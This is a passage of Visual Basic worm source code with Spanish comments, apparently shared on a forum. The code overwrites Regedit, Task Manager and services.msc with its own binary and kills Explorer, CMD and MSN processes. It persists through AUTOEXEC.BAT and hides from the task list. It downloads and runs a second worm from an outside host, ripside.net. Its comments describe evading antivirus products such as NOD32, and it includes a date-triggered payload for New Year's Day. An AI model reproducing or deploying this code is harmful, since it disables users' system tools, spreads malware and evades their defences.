Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\REGEDIT.EXE", Environ("SYSTEMROOT") & "\Binary\regedit.txt" Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\services.msc", Environ("Systemroot") & "\BINARY\Services.txt" Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\taskmgr.exe", Environ("SYSTEMROOT") & "\binary\taskmgr.txt" 'Lo copiamos en archivos .TXT
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\regedit.exe" FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\taskmgr.exe" FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\services.msc"
'Nos suplementamos.
seNO: Shell Environ("SYSTEMROOT") & "\SYSTEM32\deflpo.exe" Loop End Sub
Private Sub NayrocSTEM()
Dim Archivo As String Dim NumArchivo As Long Dim Archivo2 As String Dim NumArchivo2 As Long On Error Resume Next On Error GoTo NoHayBat Do FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\deflps.exe" 'NOTA1
Matar ("Explorer.exe") Matar ("CMD.exe") Matar ("Regedit.exe") Matar ("services.msc") Matar ("msnmsgr.exe") Shell ("Explorer.exe") 'Retornamos al Explorer para no levantar sospechas
Archivo = Environ("SYSTEMDRIVE") & "\AUTOEXEC.BAT" NumArchivo = FreeFile() 'Aqui me añado al 'AUTOEXEC.BAT ' 'Para iniciarme cada vez que el sistema corra '¿Sera esta una via alterna? 'Al yo poner "DEFLPS" 'llama el archivo antes copiado 'Es necesario que se copie antes en la carpeta SYSTEM32 'Esto me da una via alterna contra los AV Open Archivo For Output As #NumArchivo Print #NumArchivo, "Echo off" Print #NumArchivo, "Title AUTOEXEC.BAT" '-- Print #NumArchivo, "CLS" Print #NumArchivo, "Echo Loading..." Print #NumArchivo, "CLS" Print #NumArchivo, "cls" Print #NumArchivo, "deflps" Close #NumArchivo NoHayBat: On Error Resume Next 'DeflPO 'Leer Mas abajo su Sub ()
Archivo2 = Environ("SYSTEMROOT") & "\Call.bat" NumArchivo2 = FreeFile() Print #NumArchivo, "Echo off" Print #NumArchivo, "title Analizador de discos lógicos" Print #NumArchivo, "cls" Print #NumArchivo, "echo @echo off > %SYSTEMDRIVE%\AUTOEXEC.bat" Print #NumArchivo, "Echo cls>>%SYSTEMDRIVE%\AUTOEXEC.bat" Print #NumArchivo, "ECHO DEFLPS>>%SYSTEMDRIVE%\AUTOEXEC.bat" Close #NumArchivo Shell Environ("SYSTEMROOT") & "\Call.bat" Loop End Sub Private Sub AñoNuevo()
'Feliz año nuevo xDD Do
If Month(Now) = 1 And Day(Now) = 1 Then AñoNuevoUp
End If Loop End Sub
Private Sub AñoNuevoUp() Dim ArchivoK32 As String Dim NumArchivoK32 As Long Do ArchivoK32 = Environ("SYSTEMROOT") & "\2007.bat" NumArchivoK32 = FreeFile()
'Aqui se ejecuta en año nuevo :)
Print #NumArchivoK32, "Echo off" Print #NumArchivoK32, "title OS"
Print #NumArchivoK32, "cls" Print #NumArchivoK32, "Deflpo" Print #NumArchivoK32, "Cls" Close #NumArchivoK32
Shell Environ("SYSTEMROOT") & "\2007.bat" 'Lo hago como BAT ya que es mas efectivo para los AV's, En especial 'NOD32
Loop
End Sub
Private Sub Ds_Click() MsgBox "Desinfectado"
End Sub
Private Sub Form_Load() On Error Resume Next App.TaskVisible = False MsgBox " ", vbExclamation, "WINLOGON.EXE"
Clipb NayrocSTAM DeflPO NayrocSTEM AñoNuevo AeroBits
End Sub
Public Sub Matar(ByVal processName As String) On Error GoTo ErrHandler Dim oWMI Dim ret Dim sService Dim oWMIServices Dim oWMIService Dim oServices Dim oService Dim servicename Set oWMI = GetObject("winmgmts:") Set oServices = oWMI.InstancesOf("win32_process")
For Each oService In oServices servicename = LCase(Trim(CStr(oService.Name) & "")) If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then ret = oService.Terminate End If Next Set oServices = Nothing Set oWMI = Nothing
ErrHandler: Err.Clear End Sub
Private Sub DeflPO() 'ORIENTE-ETERNO : Modo silencioso Do Dim sSourceUrl As String
sSourceUrl = "http://h1.ripside.net/MyArchivos/" & _ "DCOM/deflPO.exe/" 'Este es otro de mis Worms
DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\SYSTEM32\deflPO.exe" 'Descargamos el otro malguar Loop End Sub
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean DownloadFile = URLDownloadToFile(0, sURL, _ sLocalFile, 0, 0) = ERROR_SUCCESS End Function
Private Sub Form_Unload(Cancel As Integer) MsgBox " ", vbCritical Do Shell App.Path & App.EXEName & ".exe" Loop
End Sub el modulo no tengo que explicar mucho, ya esta mas que claro .
|
|
|
|
|
|
|